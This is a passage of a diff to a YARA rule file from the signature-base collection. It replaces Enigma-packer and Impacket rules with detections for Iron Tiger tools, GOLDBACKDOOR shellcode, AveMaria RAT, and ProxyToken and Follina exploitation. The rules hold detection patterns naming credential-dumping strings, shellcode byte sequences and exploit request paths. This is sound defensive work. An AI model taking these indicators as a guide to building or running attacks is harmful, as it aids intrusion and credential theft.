+		$str6 = "[+Y] cwnd : %3d, fligth:" wide ascii
 
 	condition:
-		filesize < 1000KB and all of ( $a* ) and 1 of ( $xr* )
+		uint16( 0 ) == 0x5a4d and ( any of ( $str* ) )
 }
-rule SIGNATURE_BASE_Enigmapacker_Rare : FILE
+rule SIGNATURE_BASE_Irontiger_Plugx_Server : FILE
 {
 	meta:
-		description = "Detects an ENIGMA packed executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "748bc74c-e83f-5740-8ff7-f1371fc22802"
-		date = "2017-04-27"
+		description = "Iron Tiger Malware - PlugX Server"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "38011a23-3ed7-5f58-a814-2551526b27f3"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_enigma_protector.yar#L8-L23"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L205-L225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a001b563db1b75581432d42a435683f24e244b6b354f83409b5b9d6d0314d63a"
-		score = 60
+		logic_hash = "14b3f3b75cf6d042934e6916c99fe41d54065d59be6eb30b3cecc799997ac9d4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "77be6e80a4cfecaf50d94ee35ddc786ba1374f9fe50546f1a3382883cb14cec9"
 
 	strings:
-		$s1 = "P.rel$oc$" fullword ascii
-		$s2 = "ENIGMA" fullword ascii
+		$str1 = "\\UnitFrmManagerKeyLog.pas" wide ascii
+		$str2 = "\\UnitFrmManagerRegister.pas" wide ascii
+		$str3 = "Input Name..." wide ascii
+		$str4 = "New Value#" wide ascii
+		$str5 = "TThreadRControl.Execute SEH!!!" wide ascii
+		$str6 = "\\UnitFrmRControl.pas" wide ascii
+		$str7 = "OnSocket(event is error)!" wide ascii
+		$str8 = "Make 3F Version Ok!!!" wide ascii
+		$str9 = "PELEASE DO NOT CHANGE THE DOCAMENT" wide ascii
+		$str10 = "Press [Ok] Continue Run, Press [Cancel] Exit" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
 }
-rule SIGNATURE_BASE_Enigma_Protected_Malware_May17_Rhxfiles : FILE
+rule SIGNATURE_BASE_Irontiger_Readpwd86 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file RhxFiles.dll"
-		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
-		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
-		date = "2017-05-02"
+		description = "Iron Tiger Malware - ReadPWD86"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "5db832be-4b8e-536f-8db7-a215a90284e2"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_enigma_protector.yar#L25-L39"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L227-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "838ab7dddda798d2f5c79fc5417693f8489195b3024c43d9ad1aab05fcfd71eb"
+		logic_hash = "c188b033aee6b7e811c125af545aa7851cd45ba02e057ee93967fa98d1c13947"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2187d6bd1794bf7b6199962d8a8677f19e4382a124c30933d01aba93cc1f0f15"
 
 	strings:
-		$op1 = { bd 9c 74 f6 7a 3a f7 94 c5 7d 7c 7c 7c 7e ae 73 }
-		$op2 = { 82 62 6b 6b 6b 68 a5 ea aa 69 6b 6b 6b 3a 3b 94 }
-		$op3 = { 7c 7c c5 7d 7c 7c 7c 7e ae 73 f9 79 7c 7c 7c f6 }
+		$str1 = "Fail To Load LSASRV" wide ascii
+		$str2 = "Fail To Search LSASS Data" wide ascii
+		$str3 = "User Principal" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( all of ( $str* ) )
 }
-rule SIGNATURE_BASE_Enigma_Protected_Malware : FILE
+rule SIGNATURE_BASE_Irontiger_Ring_Gh0Stvariant : FILE
 {
 	meta:
-		description = "Detects samples packed by Enigma Protector"
-		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
-		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
-		date = "2017-02-03"
+		description = "Iron Tiger Malware - Ring Gh0stvariant"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "6858550a-4000-581c-b270-370db8ed1c57"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/OEVQ9w"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_enigma_protector.yar#L41-L55"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L242-L257"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1a254d4d593b73d16d1cfbd73d7d4b2732a080cb98d70972de0826433b004152"
+		logic_hash = "6df729e3b472d3930f5bc4a1b5b8736567df43b78bec3401f5d41bf7ba30d93b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d4616f9706403a0d5a2f9a8726230a4693e4c95c58df5c753ccc684f1d3542e2"
 
 	strings:
-		$s1 = { 5d 5d 5d aa bf 5e 95 d6 dc 51 5d 5d 5d 5e 98 0d }
-		$s2 = { 52 d9 47 5d 5d 5d dd a6 b4 52 d9 4c 5d 5d 5d 3b }
-		$s3 = { 9f 59 14 52 d8 a9 a2 a2 a2 00 9f 51 5d d6 d1 79 }
+		$str1 = "RING RAT Exception" wide ascii
+		$str2 = "(can not update server recently)!" wide ascii
+		$str4 = "CreaetProcess Error" wide ascii
+		$bla1 = "Sucess!" wide ascii
+		$bla2 = "user canceled!" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
 }
-
-rule SIGNATURE_BASE_MAL_Devilstongue_Hijackdll : FILE
+rule SIGNATURE_BASE_Irontiger_Wmiexec
 {
 	meta:
-		description = "Detects SOURGUM's DevilsTongue hijack DLL"
-		author = "Microsoft Threat Intelligence Center (MSTIC)"
-		id = "390b8b73-6740-513d-8c70-c9002be0ce69"
-		date = "2021-07-15"
+		description = "Iron Tiger Tool - wmi.vbs detection"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "a3060f50-3594-5da9-98e2-6fa0087451f5"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_candiru.yar#L3-L47"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L259-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4ad58a77f9ab5fa078dc40f3ec1d0b0180f25ff3ea304a3c85889df29739e0f5"
-		score = 80
+		logic_hash = "7988b993345e13b64e5f02ecd2679fc484b063a4cd2f18b52d00d2dfa34d82cb"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$str1 = "windows.old\\windows" wide
-		$str2 = "NtQueryInformationThread"
-		$str3 = "dbgHelp.dll" wide
-		$str4 = "StackWalk64"
-		$str5 = "ConvertSidToStringSidW"
-		$str6 = "S-1-5-18" wide
-		$str7 = "SMNew.dll"
-		$code1 = { B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8 }
-		$code2 = { 44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19 }
+		$str1 = "Temp Result File , Change it to where you like" wide ascii
+		$str2 = "wmiexec" wide ascii
+		$str3 = "By. Twi1ight" wide ascii
+		$str4 = "[both mode] ,delay TIME to read result" wide ascii
+		$str5 = "such as nc.exe or Trojan" wide ascii
+		$str6 = "+++shell mode+++" wide ascii
+		$str7 = "win2008 fso has no privilege to delete file" wide ascii
 
 	condition:
-		filesize < 800KB and uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and ( 4 of them or ( $code1 and $code2 ) or pe.imphash ( ) == "9a964e810949704ff7b4a393d9adda60" )
+		2 of ( $str* )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Wmiexec : FILE
+rule SIGNATURE_BASE_SVG_Loadurl : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c2c7edf-da71-53dc-9ddf-dfbf10838a27"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L32-L47"
+		id = "c3d4c95f-ef8b-52ff-9cf9-d66d9b99a490"
+		date = "2015-05-24"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/psjCCc"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cryptowall_svg.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1ac78768ae230aa00f392f7a7886589b14814e9c7379528d2ecd218852086ee4"
-		score = 75
+		logic_hash = "d9e40694e2d0099495289a2074e266bace9b0d9d776391020a1527eaabd2a395"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
+		hash1 = "ac8ef9df208f624be9c7e7804de55318"
+		hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"
+		hash3 = "7e2be5cc785ef7711282cea8980b9fee"
+		hash4 = "4e2c6f6b3907ec882596024e55c2b58b"
 
 	strings:
-		$s1 = "bwmiexec.exe.manifest" fullword ascii
-		$s2 = "swmiexec" fullword ascii
-		$s3 = "\\yzHPlU=QA" ascii
+		$s1 = "</svg>" nocase
+		$s2 = "<script>" nocase
+		$s3 = "location.href='http" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
+		all of ( $s* ) and filesize < 600
 }
-rule SIGNATURE_BASE_Impacket_Tools_Sniffer : FILE
+rule SIGNATURE_BASE_Metasploit_Loader_Rsmudge : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "Detects a Metasploit Loader by RSMudge - file loader.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L49-L63"
+		id = "4d8a215e-a942-5df9-bdad-0c4158992429"
+		date = "2016-04-20"
+		modified = "2023-12-05"
+		reference = "https://github.com/rsmudge/metasploit-loader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_loader_rsmudge.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77f4a7cdfced27ea342fe0fe6debebb720b7494b3f352465ab2fd92f2b7178ab"
+		logic_hash = "50b1898e3087a5e0876b87179252c452af48e00bbef52297060d70acd90d0133"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
+		hash1 = "afe34bfe2215b048915b1d55324f1679d598a0741123bc24274d4edc6e395a8d"
 
 	strings:
-		$s1 = "ssniffer" fullword ascii
-		$s2 = "impacket.dhcp(" ascii
+		$s1 = "Could not resolve target" fullword ascii
+		$s2 = "Could not connect to target" fullword ascii
+		$s3 = "%s [host] [port]" fullword ascii
+		$s4 = "ws2_32.dll is out of date." fullword ascii
+		$s5 = "read a strange or incomplete length value" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 3 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Mmcexec : FILE
+rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Inital_Shellcode
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cca2082f-72a4-50c8-80b8-a9bed430dc4e"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L65-L79"
+		description = "Detection for initial shellcode loader used to deploy GOLDBACDOOR"
+		author = "Silas Cutler (silas@Stairwell.com)"
+		id = "daab8e54-11b3-51cc-8bee-55b078f3e791"
+		date = "2022-04-21"
+		modified = "2023-12-05"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_goldbackdoor.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1aee75155ed3d868f576d7d650f0791ac54e351851f7bfb65390b4ae5c4c83b9"
-		score = 75
+		logic_hash = "4df97181037a580098dbe34d3b6ceab5c7b83932f1831c36ee99876a8f1524f9"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "263a1655a94b7920531e123a8c9737428f2988bf58156c62408e192d4b2a63fc"
+		tags = ""
+		version = "0.1"
 
 	strings:
-		$s1 = "smmcexec" fullword ascii
-		$s2 = "\\yzHPlU=QA" ascii
+		$ = { C7 45 C4 25 6C 6F 63 50 8D 45 C4 C7 45 C8 61 6C 61 70 8B F9 C7 45
+              CC 70 64 61 74 50 B9 BD 88 17 75 C7 45 D0 61 25 5C 6C 8B DA C7 45 D4 6F
+              67 5F 67 C7 45 D8 6F 6C 64 2E C7 45 DC 74 78 74 00 }
+		$ = { 51 50 57 56 B9 E6 8E 85 35 E8 ?? ?? ?? ?? FF D0 }
+		$ = { 6A 40 68 00 10 00 00 52 6A 00 FF 75 E0 B9 E3 18 90 72 E8 ?? ?? ?? ?? FF D0}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 16000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Ifmap : FILE
+rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Injected_Shellcode
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5461916-ec2b-5f65-b938-267483f50bb2"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L81-L95"
+		description = "Detection for injected shellcode that decodes GOLDBACKDOOR"
+		author = "Silas Cutler (silas@Stairwell.com)"
+		id = "aa921f01-98cc-51ab-877a-e7beede77e36"
+		date = "2022-04-21"
+		modified = "2023-12-05"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_goldbackdoor.yar#L22-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bbe875e03434c040da914e81ec5ef691ba8fd02607631e118d958819d0e94ff5"
-		score = 75
+		logic_hash = "b45f408c0f342591e66ef0dfcfc1c09f8558c5e8f4bd7f824b30f00d531c7511"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "20a1f11788e6cc98a76dca2db4691963c054fc12a4d608ac41739b98f84b3613"
+		tags = ""
+		version = "0.1"
 
 	strings:
-		$s1 = "bifmap.exe.manifest" fullword ascii
-		$s2 = "impacket.dcerpc.v5.epm(" ascii
+		$dec_routine = { 8A 19 57 8B FA 8B 51 01 83 C1 05 85 D2 74 0E 56 8B C1 8B F2 30 18 40 83 EE 01 75 F8 5E 57 }
+		$rtlfillmemory_load = { B9 4B 17 CD 5B 55 56 33 ED 55 6A 10 50 E8 86 00 00 00 FF D0 }
+		$ = "StartModule"
+		$log_file_name = { C7 44 24 3C 25 6C 6F 63 50 8D 44 24 40 C7 44 24 44 61 6C
+                           61 70 50 B9 BD 88 17 75 C7 44 24 4C 70 64 61 74 C7 44 24
+                           50 61 25 5C 6C C7 44 24 54 6F 67 5F 67 C7 44 24 58 6F 6C
+                           64 32 C7 44 24 5C 2E 74 78 74 }
+		$ = { B9 8E 8A DD 8D 8B F0 E8 E9 FB FF FF FF D0 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Karmasmb : FILE
+rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Generic_Shellcode
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "32c810c7-02e7-5203-b2ed-4e930b318cc0"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L97-L110"
+		description = "Generic detection for shellcode used to drop GOLDBACKDOOR"
+		author = "Silas Cutler (silas@Stairwell.com)"
+		id = "70081d63-0b26-5358-8444-5adc3a44aaa0"
+		date = "2022-04-21"
+		modified = "2023-12-05"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_goldbackdoor.yar#L44-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "94322dda799bcb25caeb7f9e526bcc14c6dfd9247080b4bb79dcd7b340fcb36c"
+		logic_hash = "e046a70b1dee020ba73d960a9d91daaccd0b5c262965c8647f608c5c83a28257"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
+		tags = ""
+		version = "0.1"
 
 	strings:
-		$s1 = "bkarmaSMB.exe.manifest" fullword ascii
+		$ = { B9 8E 8A DD 8D 8B F0 E8 ?? ?? ?? ?? FF D0 }
+		$ = { B9 8E AB 6F 40 [1-10] 50 [1-10] E8 ?? ?? ?? ?? FF D0 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Samrdump : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Proxytoken_Exploitation_Aug21_1 : CVE_2021_33766
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "Detects ProxyToken CVE-2021-33766 exploitation attempts on an unpatched system"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd274719-c8cc-5882-8d75-192ad822c6b3"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L112-L126"
+		id = "f4840140-6d31-52f9-b1a0-2acdd4b955cd"
+		date = "2021-08-30"
+		modified = "2023-12-05"
+		reference = "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2021_33766_proxytoken.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6bc0a4d9f9bd0d72e7f2ce4b0f8608296e6f2db14fd3a1740e0eebfe35629018"
+		logic_hash = "ff0c3e4f7491f5faec3e2688819ea5ec636a7d4eb57941afff6f53f60b0c0293"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
+		tags = "CVE-2021-33766"
 
 	strings:
-		$s2 = "bsamrdump.exe.manifest" fullword ascii
-		$s3 = "ssamrdump" fullword ascii
+		$ss0 = "POST " ascii
+		$ss1 = " 500 0 0"
+		$sa1 = "/ecp/" ascii
+		$sa2 = "/RulesEditor/InboxRules.svc/NewObject" ascii
+		$sb1 = "/ecp/" ascii
+		$sb2 = "SecurityToken=" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		all of ( $ss* ) and ( all of ( $sa* ) or all of ( $sb* ) )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Rpcdump : FILE
+rule SIGNATURE_BASE_Tofu_Backdoor
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3f998aa6-c260-5fef-99ef-e8b4770c68c6"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L128-L142"
+		description = "Detects Tofu Trojan"
+		author = "Cylance"
+		id = "03848366-f139-5352-959d-390992d96296"
+		date = "2017-02-28"
+		modified = "2023-12-05"
+		reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ham_tofu_chches.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf0a64391ef0a5d3f87996fb3e4f152a3ff4938356b96f840aa3f4f4f30aaa97"
+		logic_hash = "67c49456dbe4dc4c8bc54139ce6d493ea5588392d8c64010d029d7a63ac7f976"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
+		tags = ""
 
 	strings:
-		$s1 = "srpcdump" fullword ascii
-		$s2 = "impacket.dcerpc.v5.epm(" ascii
+		$a = "Cookies: Sym1.0"
+		$b = "\\\\.\\pipe\\1[12345678]"
+		$c = {66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		$a or $b or $c
 }
-rule SIGNATURE_BASE_Impacket_Tools_Secretsdump : FILE
+rule SIGNATURE_BASE_MAL_Avemaria_RAT_Jul19 : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "Detects AveMaria RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c944d051-ea24-5595-abef-59e326ad56de"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L144-L158"
+		id = "960048cf-7a56-50cf-8498-549f900770d8"
+		date = "2019-07-01"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/abuse_ch/status/1145697917161934856"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_avemaria_rat.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "462748d60764c6fbaeede48b5a98cb68f61cf695f976bf6db94cb497be48fcb2"
+		logic_hash = "a848ec579db6a07faeab5c855a56889b4bfeaa2958d0388f7fe8c6dcdea7e457"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
+		hash1 = "5a927db1566468f23803746ba0ccc9235c79ca8672b1444822631ddbf2651a59"
 
 	strings:
-		$s1 = "ssecretsdump" fullword ascii
-		$s2 = "impacket.ese(" ascii
+		$a1 = "operator co_await" fullword ascii
+		$s1 = "uohlyatqn" fullword ascii
+		$s2 = "index = [%d][%d][%d][%d]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Esentutl : FILE
+rule SIGNATURE_BASE_SUSP_PS1_Msdt_Execution_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1965e2b3-54be-553a-83d6-a0d4919414dd"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L160-L174"
+		description = "Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Nasreddine Bencherchali, Christian Burkard"
+		id = "d48d9ac9-7d3e-51c9-b017-22829ae5ecfd"
+		date = "2022-05-31"
+		modified = "2025-03-21"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e972ad610df65309f4e5996ad0b537670b944f43b810fda5a890ea995193a97a"
-		score = 75
+		logic_hash = "9b8a061de4210d23e58b5190a300ee331273fc98f357156a0bb1d79f9f2b49b1"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "70d854953d3ebb2c252783a4a103ba0e596d6ab447f238af777fb37d2b64c0cd"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s1 = "impacket.ese(" ascii
-		$s2 = "sesentutl" fullword ascii
+		$a = "PCWDiagnostic" ascii wide fullword
+		$sa1 = "msdt.exe" ascii wide
+		$sa2 = "msdt " ascii wide
+		$sa3 = "ms-msdt" ascii wide
+		$sb1 = "/af " ascii wide
+		$sb2 = "-af " ascii wide
+		$sb3 = "IT_BrowseForFile=" ascii wide
+		$fp1 = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00
+               46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00
+               00 00 70 00 63 00 77 00 72 00 75 00 6E 00 2E 00
+               65 00 78 00 65 00 }
+		$fp2 = "FilesFullTrust" wide
+		$fp3 = "Cisco Spark" ascii wide
+		$fp4 = "author: " ascii
 
 	condition:
